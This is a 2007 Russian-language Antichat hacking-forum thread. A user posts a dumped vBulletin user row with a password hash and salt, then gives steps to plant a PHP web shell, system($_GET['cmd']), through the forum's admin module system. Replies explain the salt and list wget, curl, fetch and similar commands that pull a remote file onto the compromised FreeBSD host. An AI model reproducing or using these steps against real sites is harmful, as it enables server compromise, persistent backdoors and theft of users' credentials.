Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
15.01.2007, 00:50
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 8
Провел на форуме:
41328
Репутация:
4
|
|
vBulletin [db] Где соль?
Может глупый вопрос, но что-то понять не могу. Вот сдамбил базу юзеров, получил примерно вот такую тему:
PHP код:
INSERT INTO vb_user VALUES('1','6','','0','Rich','6c507b8dd286d058e69a37436a751bde','2006-11-20','***@gmail.com','0','','','','','','2','Администратор','0','1127663100','0','1159464415','1163971905','1152297660','33','10','5','3','0','0','0','0','2135','','0000-00-00','-1','1','','0','0','','0','0','-1','0','0','p\\u','2','','2','1','1');
А соль здесь получается "p\\u", или что?
Добавил: И что бы новую тему не создавать, помгите пожалуйста.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?
Последний раз редактировалось Krasti; 15.01.2007 в 00:53..
|
|
|
15.01.2007, 00:52
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
соль в булке состоит из 3 знаков, может в другой таблице
|
|
|
|
15.01.2007, 00:55
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 8
Провел на форуме:
41328
Репутация:
4
|
|
Сообщение от maxster
соль в булке состоит из 3 знаков, может в другой таблице
Лучше от этого мне не стало.  Кстати во второй базе такая же тема, может что не так делаю? Да по другому вроде никак.
А может вообще в булке быть пароль без соли?
|
|
|
|
15.01.2007, 00:58
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854
Репутация:
409
|
|
да вот она "p\u"..просто первый символ "\" добавляется для экранирования некоторых символов (в данном случае "\"), который могут нарушить работу скрипта.
Последний раз редактировалось злюка; 15.01.2007 в 01:08..
|
|
|
|
15.01.2007, 01:46
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?
вбиваешь
which wget fetch curl links lynx
и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное
Код:
- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c
на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp
__________________
|
|
|
|
15.01.2007, 02:03
|
|
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854
Репутация:
409
|
|
Сообщение от Krasti
Цитата:
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
А какой камандой после этого можно будет залить шелл на хост (FreeBSD)?
собственно шелл ты мы уже получили, зачем еще один 
|
|
|
|
15.01.2007, 08:40
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 8
Провел на форуме:
41328
Репутация:
4
|
|
Сообщение от +toxa+
вбиваешь
which wget fetch curl links lynx
и смотришь какие качалки есть. в зависимости от этого вбиваешь нужное
Код:
- wget -o /tmp/file.c http://site.ru/file.c
- curl -o /tmp/file.c http://site.ru/file.c
- fetch -o /tmp/file.c http://site.ru/file.c
- lynx -source "http://site.ru/file.c" > /tmp/file.c
- links -source "http://site.ru/file.c" > /tmp/file.c
- GET http://site.ru/file.c > /tmp/file.c
на примере ты скачиваешь с сайта site.ru файл file.с и сохраняешь его в папке /tmp Большое спасибо!
|
|
|
|
15.01.2007, 08:42
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 8
Провел на форуме:
41328
Репутация:
4
|
|
Сообщение от злюка
собственно шелл ты мы уже получили, зачем еще один Я понимаю, что шелл есть, просто юзать такой шелл для меня труднова-то. Вот я и хочу залить шелл, который мне нравится. Кстати, спасибо за помощь.
|
|
|
|
15.01.2007, 21:06
|
|
Участник форума
Регистрация: 27.08.2006
Сообщений: 223
Провел на форуме:
2154209
Репутация:
341
|
|
вместо этого смд можешь спокойно заливать свой нормальный шелл!
|
|
|
|
15.01.2007, 21:12
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 8
Провел на форуме:
41328
Репутация:
4
|
|
Да я знаю, но работать он что-то отказывался. А смд пашет нормально. |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
